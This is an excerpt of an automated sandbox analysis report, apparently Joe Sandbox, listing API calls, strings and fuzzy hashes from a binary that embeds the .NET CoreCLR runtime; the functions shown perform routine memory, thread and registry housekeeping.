                                                                                                                                                                                                                            • Part of subcall function 01226D20: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0159BAA1,000000FF,00000000,00000000,7CAB6A82), ref: 01226D8A
                                                                                                                                                                                                                            • Part of subcall function 01226D20: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,0159BAA1,000000FF,00000000,00000000,00000000), ref: 01226DBF
                                                                                                                                                                                                                            • Part of subcall function 01226D20: OutputDebugStringW.KERNEL32(00000000), ref: 01226DD4
                                                                                                                                                                                                                            • Part of subcall function 01226D20: HeapFree.KERNEL32(00000000,00000000), ref: 01226DF4
                                                                                                                                                                                                                            • Part of subcall function 01006650: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,0159D670,0122A9EB,0159D670,00000000), ref: 01006658
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ASSERT:%s, line:%d, xrefs: 0122AA00
                                                                                                                                                                                                                          • CLR: Assert failure(PID %d [0x%08x], Thread: %d [0x%x]): %s File: %s, Line: %d Image:%s, xrefs: 0122A9BB
                                                                                                                                                                                                                          • D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 0122A998, 0122A9FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$ByteCharFreeHeapMultiProcessThreadWide$DebugFileModuleNameOutputString__acrt_iob_func
                                                                                                                                                                                                                          • String ID: ASSERT:%s, line:%d$CLR: Assert failure(PID %d [0x%08x], Thread: %d [0x%x]): %s File: %s, Line: %d Image:%s$D:\a\_work\1\s\src\coreclr\vm\threads.cpp
                                                                                                                                                                                                                          • API String ID: 700304197-3825138699
                                                                                                                                                                                                                          • Opcode ID: 7922f2ad7a6a8f3704c05d12cc3f7baa85a0f9faad4e74d35d8329bea18f60aa
                                                                                                                                                                                                                          • Instruction ID: adabfd6cdfb1431e8c1abeb30c451ee47677981d4ca099f14a2cbe121f34164b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7922f2ad7a6a8f3704c05d12cc3f7baa85a0f9faad4e74d35d8329bea18f60aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD1160B1920125BACB14EBA5DD4AFEFBA7DBF58701F00042CF505E35A1EA785904D7A1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE166
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE17F
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE1D9
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE219
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE259
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE296
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE2D3
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE316
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSection$FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 447823528-0
                                                                                                                                                                                                                          • Opcode ID: e24b96ffe102133723719bb4141fe5824bbbc5dbf6a198bc473faab1c2cb54de
                                                                                                                                                                                                                          • Instruction ID: c997731d71eada525bcb343a7720cf7d6bb17f3ffa6ed8f6dd7c93caf4b91c83
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e24b96ffe102133723719bb4141fe5824bbbc5dbf6a198bc473faab1c2cb54de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C81C33090024AEFDB11DF64C94ABEEBBB8EF21704F00055CE441E7291D778AA59E7D1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA4FC
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA5B7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA65C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA6A9
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA77C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA79E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: ea725f7b821c16780f593f2c744ff40f0d1b27223bca64eb83b95881124509f9
                                                                                                                                                                                                                          • Instruction ID: e5d470d79aee0822f5c8c9fd5d6cb61e1e786acca08ea33b95ad9149e78fb9d2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea725f7b821c16780f593f2c744ff40f0d1b27223bca64eb83b95881124509f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E1AF74A1021D9FDF21CF28CC54BAAB7B9AF55700F4442EEEA09A7251E7309E94CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 012295F0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0122968A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: InprocServer32$SOFTWARE\Classes\
                                                                                                                                                                                                                          • API String ID: 3298025750-3520655855
                                                                                                                                                                                                                          • Opcode ID: dcd46c46c75a3041140b1681a8d10b0321c949615d18fb21372e4469059e3d84
                                                                                                                                                                                                                          • Instruction ID: 5b602cd80fab48abe3b349c7efe3d1e28599e9d57732cbd253efcc928792ba80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcd46c46c75a3041140b1681a8d10b0321c949615d18fb21372e4469059e3d84
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DA16CB0914269EEEF20DF24CD49B9EBBB4AB01308F1042EDD64DA7290DB745E88CF55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002, at,00000005,00000004,00000000,?,00000002), ref: 01185542
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000002), ref: 011855E6
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000002,0159BF18,?, ,?,00000002), ref: 01185666
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,01185300,?,00000009,00000000,00000002,0159BF18,?, ,?,00000002), ref: 011856A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$wcscpy_s
                                                                                                                                                                                                                          • String ID: $ at
                                                                                                                                                                                                                          • API String ID: 1983039323-3158221822
                                                                                                                                                                                                                          • Opcode ID: 3d374c9837d5c4ac40c3c6e5b396ab7fe341e5aa0bc2c3cd97a23bc245c21f19
                                                                                                                                                                                                                          • Instruction ID: 0feca8039282ec681a8f44f16b971cf10ad29b6dfc6b425d18edd00ea1f435f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d374c9837d5c4ac40c3c6e5b396ab7fe341e5aa0bc2c3cd97a23bc245c21f19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F71BEB1D00208AFEB19DF99ED85BEDBBB6FF44710F148129E811A7290DB746905CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00650072,03C176F0,?,7CAB6A82), ref: 0115DBCE
                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000001,00000000), ref: 0115DDC5
                                                                                                                                                                                                                          • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,014DD6C5,000000FF,?,0115F6C7,03C16300), ref: 0115DDCB
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,7CAB6A82), ref: 0115DE03
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RareDisablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DC68
                                                                                                                                                                                                                          • RareDisablePreemptiveGC: leaving, xrefs: 0115DDEB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$SleepSwitchThread
                                                                                                                                                                                                                          • String ID: RareDisablePreemptiveGC: entering. Thread state = %x$RareDisablePreemptiveGC: leaving
                                                                                                                                                                                                                          • API String ID: 490134931-73906953
                                                                                                                                                                                                                          • Opcode ID: 4a5c3ae9d1d17e4344c4f0cfecf7f68700d3fefd76de7f6d3131c4d0fd51a9c7
                                                                                                                                                                                                                          • Instruction ID: 4eabc654125bdcf12fdb48ef22ef50160293044c26c0ec7bd3e922f897efae98
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a5c3ae9d1d17e4344c4f0cfecf7f68700d3fefd76de7f6d3131c4d0fd51a9c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51C230200201CBEF6DDF9CEC94B697BA5AF41714F09405CEE295B2DADBB5A851CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,DOTNET_,7CAB6A82,93F80028,0000000A,?), ref: 0121A92F
                                                                                                                                                                                                                          • wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,015AEEFC), ref: 0121A947
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,COMPlus_), ref: 0121AA0E
                                                                                                                                                                                                                          • wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,015AEEFC), ref: 0121AA21
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat_swcscpy_s
                                                                                                                                                                                                                          • String ID: COMPlus_$DOTNET_
                                                                                                                                                                                                                          • API String ID: 1337066035-1316173318
                                                                                                                                                                                                                          • Opcode ID: 161cd5e9bc82e561b5d80dd301f36ba59c27ea0ef919bf9f4e92130aa84de15e
                                                                                                                                                                                                                          • Instruction ID: 7f0659fd7a418dde4db2a6022ee3a4439327545c5e6c54224820f9fafc5a79e0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 161cd5e9bc82e561b5d80dd301f36ba59c27ea0ef919bf9f4e92130aa84de15e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34617BB1D122A99FEB21CF68C945BDEBBB8BF15700F0041DAD949A7281E7745B84CF81
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 00FD7B1B
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 00FD7B60
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,0150E144,00000000,00000000,00000000), ref: 00FD7BFD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • MVID mismatch between loaded assembly '%s' (MVID = %s) and an assembly with the same simple name embedded in the native image '%s' (MVID = %s), xrefs: 00FD7B9C
                                                                                                                                                                                                                          • MVID mismatch between loaded assembly '%s' (MVID = %s) and version of assembly '%s' expected by assembly '%s' (MVID = %s), xrefs: 00FD7BB2
                                                                                                                                                                                                                          • {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 00FD7B13, 00FD7B58
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _swprintf$FreeHeap
                                                                                                                                                                                                                          • String ID: MVID mismatch between loaded assembly '%s' (MVID = %s) and an assembly with the same simple name embedded in the native image '%s' (MVID = %s)$MVID mismatch between loaded assembly '%s' (MVID = %s) and version of assembly '%s' expected by assembly '%s' (MVID = %s)${%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                                                                                                                                                                                          • API String ID: 3104695220-1745357930
                                                                                                                                                                                                                          • Opcode ID: f163c484405587003a431ba1ed1fb970663e65c554c46d9e841d75b3f127f3d7
                                                                                                                                                                                                                          • Instruction ID: 4762a0edd1a2e33509940881539255616c20949e1104787f59cce13e177ff916
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f163c484405587003a431ba1ed1fb970663e65c554c46d9e841d75b3f127f3d7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD41B2B29002586ECB24DE999C05FFE7BECAB09611F14011AFD54E7281D638D900DBB0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,012D9EF0,?,00000000), ref: 012D67E7
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03BF100E,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,012D9EF0,?,00000000), ref: 012D6809
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,012D9EF0,?,00000000), ref: 012D681B
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03BF100E,000000FF,00000000,?,00000000,00000000), ref: 012D683C
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012DAC36), ref: 012D6847
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 012D685F
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012DAC36), ref: 012D6882
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidefree$CommandLinemallocstrcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2300001080-0
                                                                                                                                                                                                                          • Opcode ID: d73027d0ccbb89c888602dfecf58fe8eafc7fc6de03f572df2151ffd5cae7e91
                                                                                                                                                                                                                          • Instruction ID: 6541ba1d4d77be2808f80750ce33caa882bb74a52c7448060cffbc8aff1c5ce5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d73027d0ccbb89c888602dfecf58fe8eafc7fc6de03f572df2151ffd5cae7e91
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C221EB796503226BEB325B59AC0BF177A699F40B21F16013CFB05F73D4EA50D41483D1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,00000000,?,00000000,?,01418785,00000000,?,00FC0000,00000000,00FC0000), ref: 01229A72
                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,~MHz,00000000,00000000,?,00FC0000,?,01418785,00000000,?), ref: 01229A99
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,01418785,00000000,?), ref: 01229AB4
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,01418785,00000000,?), ref: 01229ACD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 01229A63
                                                                                                                                                                                                                          • ~MHz, xrefs: 01229A91
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                          • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                                                                                                                                                          • API String ID: 1607946009-2226868861
                                                                                                                                                                                                                          • Opcode ID: 331ab3b0c5c4d02d966eb6b07edab660bcfc9b7e0b90cc767df140734165a9ca
                                                                                                                                                                                                                          • Instruction ID: 2efd5281f7d78839622891df28065c63ca93885ed8da568f29e1de82f1f52e42
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331ab3b0c5c4d02d966eb6b07edab660bcfc9b7e0b90cc767df140734165a9ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3115176F0021CABCF10DA99DC45BEEB7B9EB88211F1001A6FA04F3350D670AE548B94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9E61
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9F04
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9F4A
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5421
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C54C4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C550A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA831
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA8D4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA91A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5DF1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5E94
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5EDA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF442
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF4D5
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF50D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF5D3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF5F0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C84D2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8565
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C859D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8659
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8676
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: a2d8474e0848c02bd0907c6ead319268554c68c82059b385b08926e13ec4ee3c
                                                                                                                                                                                                                          • Instruction ID: 0534e928a9a03f4dc3c99a9303715dce314d2ee190d8d6fda1e73ab24927f4f6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2d8474e0848c02bd0907c6ead319268554c68c82059b385b08926e13ec4ee3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EA1C271E102199FDB20CF74DC54BEEBBB8EF14640F15826EEA09AB241E7309955CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF782
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF815
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF84D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF909
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012BF926
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 9a5f3861d64e870d183d7d5eb52e858033b8fe91a831487ded5397bdc3730dba
                                                                                                                                                                                                                          • Instruction ID: a427987a5e6669647ea2be108512f2e196e71ae77f1e385e6fdb5c68c1ca4213
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a5f3861d64e870d183d7d5eb52e858033b8fe91a831487ded5397bdc3730dba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA1D171E102199FDB20CBB8DD90BDEBBB8EF15740F14416AE909EB252EB309954CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8812
